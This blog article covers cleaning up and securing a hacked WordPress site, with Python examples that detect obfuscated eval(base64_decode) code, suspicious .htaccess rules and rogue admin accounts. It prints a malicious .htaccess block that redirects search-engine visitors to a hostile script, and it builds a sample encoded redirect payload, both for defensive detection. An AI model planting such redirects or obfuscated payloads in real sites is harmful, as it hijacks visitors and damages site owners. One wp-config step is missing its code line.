When your WordPress site gets hacked

Mar 3, 2014

WordPress, being the most popular blogging platform across the world, is frequently targeted by hackers. The flexibility that makes WordPress so attractive can also make you vulnerable if you are not cautious. Hackers are always on the prowl to exploit any loopholes in the system. Having your site hacked is a painful, emotional, and sometimes costly experience. It can cause serious damage to your business:

  • One fine morning, instead of seeing your delicious dessert recipes, the visitors to your blog find that you are selling them banned drugs, trying to infect their systems or redirect them to a site your grandma wouldn’t have been proud of.

  • Search engine results for your site indicate that the site is hacked or harmful, which causes your reputation to plummet and you lose customers.

  • The SEO rankings of your site take a big hit.

  • All your data is compromised and this can spell doom. Imagine what would happen if someone hacked into your bank’s site!

  • With growing reports of your site being malicious, your site will be added to the “blacklists” that ISPs use to prevent users from visiting your site. It is just as if you had closed your site and gone out of business.

Once your site is hacked, it creates a spiral effect and doesn’t stop until you have found the problem and eliminated it. Failing to do so will result in your being attacked repeatedly.

Often you don’t even realize that you have come under attack, which delays the rectification process. Hence, it is always good to be on alert, constantly monitor your site, and take remedial action immediately when you notice anything wrong.

Although it is impossible to prevent every attack, there are many steps that can be taken to protect your website. Security is mandatory if you want to run a successful website, but it doesn’t necessarily have to be complicated or expensive. In this article, we’ll look at how to get back up on your feet when you come under attack and more importantly, measures to prevent further attempts at hacking your site.

Bouncing Back After Being Hacked

So you’ve confirmed that your site has been hacked and hit the panic button. Stay calm and breathe deeply. The following remedial measures will help you organize your plan of action in the face of this calamity.

Tell the world. If your site has been hacked, you want to stop the bad guys from attacking your customers, damaging your reputation, or hurting your SEO rankings. The best thing to do is put your site in maintenance mode, making your site temporarily unavailable to public access. You can then post a suitable message, possibly including a contact number for people to be able to reach you. There are many plugins such as Maintenance Mode that help you do this.

Save the logs. Before you proceed with restoring your site, it is a good idea to save all the information related to the hack. This includes the hacked page, errors, and anything else that you deem worth noting down. Saving all this information will help in cleaning up your site later.

Contact the host. At times, vulnerabilities of your hosting provider may be exploited to hack your site. Hence it is important to contact your host team to let them know of the problem. Sometimes the hosting provider can also take your site offline when suspicious activity is observed, for example a large amount of spam originating from your site and loading the server. In such cases, you must clean up your site and contact your host to get your site up and running again.

Restore your backup. The quickest way of getting your site back to its old glory is to delete all the content and restore your backup. Once completed, your site is up and running again. blogVault is one of the premier WordPress backup services that performs daily automatic backup of all your sites. The tricky part of restoring a site is to know the safest rollback point. Using a service like blogVault will help you circumvent the problem as it maintains up to 30 backups to choose from.

Manual cleanup. In the unfortunate situation of not having a backup, you are left with the only choice of manually cleaning up your site. This is a very tedious task and can take many hours.

Some tips that come in handy while cleaning up your files are as follows:

  1. Look for files that seem out of place – mydata.php or easy.zip. They don’t necessarily have to end with the .php extension.

  2. Malicious code may also be contained within legitimate files and finding them is an uphill task, especially if you are not a programmer.

A common technique is to obfuscate malicious code by encoding it with the PHP base64_encode() function and then using the base64_decode() function to decode (i.e. un-hide) it. Finally, the eval() function is used to evaluate or run the malicious code. This malicious line is placed at the top of as many PHP files as possible. The malicious code could redirect your site somewhere else on the Internet so that the attacker makes money. If one earns $0.01 per redirection to an ad on the web, imagine how much money an attacker could make if a popular site gets infected.
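A sketch of how the eval(base64_decode(...)) pattern described above can be located and decoded for review without running it. This is an added example, not code from the original article; the function names, the sample file names and the malicious-site.example payload are constructed for illustration.

```python
import base64
import re
import tempfile
from pathlib import Path

# Matches eval(base64_decode('<literal>')) with optional whitespace and either quote style.
EVAL_B64 = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*(['\"])([A-Za-z0-9+/=\s]+)\1\s*\)\s*\)",
    re.IGNORECASE,
)

def scan_tree(root):
    """Return one finding per eval(base64_decode(...)) call under root.

    The payload is decoded for review only; nothing is executed.
    Every file is read, because suspicious files need not end in .php.
    """
    findings = []
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file():
            continue
        text = path.read_text(encoding="utf-8", errors="replace")
        for m in EVAL_B64.finditer(text):
            try:
                decoded = base64.b64decode(m.group(2)).decode("utf-8", "replace")
            except ValueError:
                decoded = "<not valid base64>"
            findings.append({
                "file": path.relative_to(root).as_posix(),
                "line": text.count("\n", 0, m.start()) + 1,
                "decoded": decoded,
            })
    return findings

def build_sample_site(root):
    """Constructed sample data: one clean file and two files carrying the injected line."""
    payload = base64.b64encode(b'header("Location: http://malicious-site.example/");').decode()
    injected = "<?php eval(base64_decode('%s')); ?>\n" % payload
    root = Path(root)
    (root / "wp-content/uploads").mkdir(parents=True)
    (root / "index.php").write_text(injected + "<?php require 'wp-blog-header.php';\n")
    (root / "wp-content/uploads/easy.txt").write_text("notes\n" + injected)
    (root / "wp-load.php").write_text("<?php // clean file\n")

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as site:
        build_sample_site(site)
        for f in scan_tree(site):
            print(f"{f['file']}:{f['line']}: {f['decoded']}")
```

A match is a lead to review by hand: the pattern only covers payloads passed as a literal string, so a clean result does not prove the file tree is clean.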

There are many services such as MalCare Malware Scanner, Sucuri, Unmask Parasites, and Is-It-Hacked, as well as WordPress plugins, that help you scan your site to find these tricksters. See the section on Preventing Further Attacks for more details on these services and plugins.

  3. Look for suspicious redirects in the .htaccess file. For example:

RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
RewriteRule .* http://malicious-site.com/bad.php?t=3 [R,L]

This rewrite code checks the referrer of each request; if it is a popular search engine, it redirects the visitor to the hackers’ website and tries to load the malicious bad.php script.

Since these RewriteCond conditional statements only match search engine bots, these hacks can go unnoticed for some time. Unfortunately, the longer they’re active, the more damage they cause to your search engine rankings.

To fix the issue, just delete the suspect lines and save the file.
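One way to find such blocks before deleting them is to flag every RewriteRule whose conditions test the referrer or user agent and whose target is an absolute URL on a host you do not own. This is an added example, not code from the original article; audit_htaccess and its own_hosts parameter are names assumed here, and the sample file is constructed from the block above plus a stock WordPress rule.

```python
import re
from urllib.parse import urlsplit

# Constructed sample: part of the redirect block shown above plus a stock WordPress rule.
SAMPLE_HTACCESS = """\
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
RewriteRule .* http://malicious-site.com/bad.php?t=3 [R,L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
"""

DIRECTIVE = re.compile(r"^\s*(RewriteCond|RewriteRule)\s+(\S+)\s+(\S+)", re.IGNORECASE)
WATCHED = ("HTTP_REFERER", "HTTP_USER_AGENT")

def audit_htaccess(text, own_hosts):
    """Flag RewriteRules that send selected visitors to a host outside own_hosts.

    A rule is reported when the RewriteCond lines directly before it test the
    referrer or user agent and its target is an absolute URL on a foreign host.
    """
    findings, conds, first_line = [], [], None
    for lineno, line in enumerate(text.splitlines(), 1):
        m = DIRECTIVE.match(line)
        if not m:
            continue
        kind, arg1, arg2 = m.group(1).lower(), m.group(2), m.group(3)
        if kind == "rewritecond":
            if first_line is None:
                first_line = lineno
            conds.append(arg1.upper())
            continue
        # RewriteRule: the conditions collected so far apply to this rule only.
        host = urlsplit(arg2).hostname
        selective = any(w in c for c in conds for w in WATCHED)
        if host and host.lower() not in own_hosts and selective:
            findings.append({"lines": (first_line, lineno), "target": arg2})
        conds, first_line = [], None
    return findings

if __name__ == "__main__":
    for f in audit_htaccess(SAMPLE_HTACCESS, {"example.com"}):
        print("review lines %d-%d -> %s" % (*f["lines"], f["target"]))
```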

Apart from WordPress files, hackers can also wreak havoc by breaking into your database. Since the database stores all the content of your site such as users, posts, comments, etc., a hacked database may pose a big threat to you.

The following are some useful measures to clean up your database:

  1. Hackers commonly add users to your database with admin access. This gives them free access to your site even after you have cleaned it up. To solve this problem:

    • Log in to phpMyAdmin using cPanel.
    • Navigate to the users (e.g. wp_users) table within your site’s database.
    • Delete all users except the primary admin.
    • Change the admin password, the email associated with it and also the corresponding FTP account.
  2. Hacks such as the Pharma Attack use the options (e.g. wp_options) table to load their spam. Some of the common option_name values to look for and clean up are listed below:
    • class_generic_support
    • widget_generic_support
    • fwp
    • wp_check_hash
    • rss_7988287cd8f4f531c6b94fbdbc4e1caf
    • rss_d77ee8bfba87fa91cd91469a5ba5abea
    • rss_552afe0001e673901a9f2caebdd3141d
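Before deleting anything, a read-only review of both points above shows which administrator accounts and which of the listed options are actually present. This is an added example, not code from the original article; it uses an in-memory SQLite database with constructed rows as a stand-in for the site's MySQL database, and audit_database, primary_admin and the sample user names are assumptions made for illustration.

```python
import sqlite3

# option_name values listed above for the Pharma hack.
PHARMA_OPTIONS = (
    "class_generic_support", "widget_generic_support", "fwp", "wp_check_hash",
    "rss_7988287cd8f4f531c6b94fbdbc4e1caf", "rss_d77ee8bfba87fa91cd91469a5ba5abea",
    "rss_552afe0001e673901a9f2caebdd3141d",
)

def audit_database(db, primary_admin, prefix="wp_"):
    """Read-only review: administrators other than primary_admin, and listed options.

    prefix is the table prefix set by the site operator; it is not user input.
    """
    admins = db.execute(
        f"SELECT u.user_login, u.user_registered FROM {prefix}users u "
        f"JOIN {prefix}usermeta m ON m.user_id = u.ID "
        "WHERE m.meta_key = ? AND m.meta_value LIKE '%\"administrator\"%' "
        "AND u.user_login <> ? ORDER BY u.user_registered",
        (prefix + "capabilities", primary_admin),
    ).fetchall()
    marks = ",".join("?" * len(PHARMA_OPTIONS))
    options = db.execute(
        f"SELECT option_name FROM {prefix}options "
        f"WHERE option_name IN ({marks}) ORDER BY option_name",
        PHARMA_OPTIONS,
    ).fetchall()
    return admins, [row[0] for row in options]

def build_sample_db():
    """Constructed sample data in SQLite, standing in for the site's MySQL database."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE wp_users (ID INTEGER, user_login TEXT, user_registered TEXT);
        CREATE TABLE wp_usermeta (user_id INTEGER, meta_key TEXT, meta_value TEXT);
        CREATE TABLE wp_options (option_name TEXT, option_value TEXT);
        INSERT INTO wp_users VALUES (1, 'owner', '2012-05-01 09:00:00'),
            (2, 'editor1', '2013-02-10 12:00:00'), (3, 'wpsupport', '2014-02-27 03:14:00');
        INSERT INTO wp_usermeta VALUES
            (1, 'wp_capabilities', 'a:1:{s:13:"administrator";b:1;}'),
            (2, 'wp_capabilities', 'a:1:{s:6:"editor";b:1;}'),
            (3, 'wp_capabilities', 'a:1:{s:13:"administrator";b:1;}');
        INSERT INTO wp_options VALUES ('siteurl', 'http://example.com'),
            ('wp_check_hash', 'x'), ('fwp', 'x');
    """)
    return db

if __name__ == "__main__":
    print(audit_database(build_sample_db(), "owner"))
```

The same two SELECT statements can be run in phpMyAdmin against the real tables; WordPress keeps each user's role in the usermeta table under the key made of the table prefix plus "capabilities".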

Preventing Further Attacks

Once your site has been restored and you are feeling calmer, it is time to move on to the next important task of securing your site against repeated attacks. Unless you find the real cause of the hack and eliminate it, chances are that you will be hacked repeatedly, even within the span of days. We’ve already covered Securing your WordPress Admin in an older article. Here are a few more measures to safeguard your site from future attacks.

Fix the backdoors. The main intent of most hackers, once they exploit vulnerabilities in a theme or plugin, is to introduce a hole through which they can remotely access your server. This allows them to gain entry even after the questionable theme or plugin has been removed or after you’ve ‘cleaned up’ your site. Your site remains vulnerable until you find these backdoors and remove them.

Backdoors come in various forms – creating admin usernames, executing PHP code sent from a browser, executing SQL queries, etc. They are commonly hidden in the following locations:

  • Themes – Especially ones that are inactive.
  • Plugins – Out of date or poorly coded ones are the common culprits.
  • Uploads directory – Rarely monitored but comes with write permissions.
  • The wp-config.php, .htaccess files – Extra lines of configuration are added.
  • Database – Unauthorized users, spam entries can be found here.

Use Plugins. The most challenging part about backdoors is finding them. Since they are commonly hidden deep inside the code, it is nearly impossible to find them unless you know your way through the code. Even for a developer, finding malicious code can be a time-consuming and frustrating experience. Thankfully, there are a number of tools that do this for you. Here’s an in-depth description of the 3 most popular WordPress security plugins.

Better WP Security

Better WP Security is easily one of the most popular security plugins with a rating of 5 stars. It combines the best security practices into a single plugin to secure your website. Some of the important features of this plugin are:

  • Scans your site for vulnerabilities such as password strength, file permissions, using default names (admin user, wp-content directory, wp_ prefix), not using secure connections for login, etc.
  • It hides the sensitive part of your site such as login, admin, and register URLs.
  • Changes the commonly used names, e.g. the content directory (wp-content), the admin username, and the database prefix “wp”, making it harder for hackers to go after the usual loopholes.
  • Limits the number of login attempts, including blacklisting repeat offenders and lockout time periods, thus preventing brute-force attacks.
  • Schedules automatic backups to help you get back on your feet quickly if your site crashes.


Sucuri is another comprehensive security plugin that checks your site for malware, spam, blacklisting, malicious code, and other issues. Some of the important features of this free plugin are:

  • Scans the complete site for malware, blacklisting, and other vulnerabilities and displays a detailed report.
  • Offers quick solutions to harden your site’s security such as using the latest WordPress and PHP versions, restricting access to core directories such as wp-content, wp-includes, and uploads, and hiding the WordPress version.
  • Checks the integrity of your site by looking at aspects like file modification time, login time, outdated themes and plugins, etc.
  • In the unfortunate event of your site getting hacked, the Sucuri plugin enables you to reset your security keys and all user passwords.

Apart from the free plugin, Sucuri also offers premium services such as round-the-clock monitoring and removal of vulnerabilities on your site. Refer to their site for more details.

Bulletproof Security

Bulletproof Security is another free security plugin that is fast gaining popularity in the WordPress community. Its ability to prevent code and SQL injection attacks is primarily responsible for its 5 star rating on wordpress.org. The important features of this plugin are:

  • Provides login security and monitoring – limits the number of login attempts, logs all login related information, configurable lockout period.
  • Includes a maintenance mode which can be extremely useful when you want to take down your site temporarily. It enables the admin to filter who gets to see the website and who will be greeted by a 503 Website. Using IP filtering, the access can be controlled directly from the plugin.
  • Locks down access to critical htaccess files by renaming and hiding them under different folders.
  • Logs HTTP errors and provides an option to add user agents and bots to a block list.

These 3 plugins should cover all the security gaps in the WordPress installation and help you protect your site from attacks.

Change all your passwords. The next step is to change all your passwords – FTP accounts, WordPress users, and database as well.

Change your WordPress secret keys. This will invalidate all the current sessions and force users to login again. Click here for more details on how you can change these keys.

Change permissions. It is a good practice to make all files and folders read-only unless there is an explicit need to change this rule. This effectively prevents hackers from uploading files to certain directories and executing them remotely. The side effect of doing this could be not being able to upload images to your server, or cache plugins failing and reporting errors. This is because some folders such as uploads and cache are inherently assumed to be writable. In such cases, it is good to make a couple of exceptions to the rule for smooth functioning of all features.

Limit what the admin can do. The WordPress admin enjoys complete control of your site and that includes editing files and installing themes/ plugins from the Dashboard. Disabling these features will prevent hackers from causing excess damage when they gain admin access to your site. You can do this by adding the following line in your WordPress config file, wp-config.php:

Refer to our article Everything about WordPress Configuration for more details. Always use the cPanel of your host to edit any file or install new components to your WordPress site.

Prevent open-for-all registration. Don’t allow unknown, outside users to register with your site. Instead, follow a strictly moderated approach to adding users to your site. The simplest way to do this is to uncheck the Anyone can register option in the Settings->General panel of your Admin Dashboard.


Upgrade. Always keep your site updated with the latest version of WordPress. You must also regularly update your plugins and themes.

Change your host. Your hosting provider may not be providing you the most secure service, making your site vulnerable to hackers. In such a case, your best option is to change to a better one.

Always have a backup. We already saw how easy it is to recover a hacked site when you maintain backups. In case you haven’t already done so, register yourself with a reliable WordPress backup service such as blogVault to back up your site regularly.


Attacks are inevitable but locking your site down with the best possible security practices is definitely in your hands. So make sure your site is in the best shape when hackers knock on your door the next time…
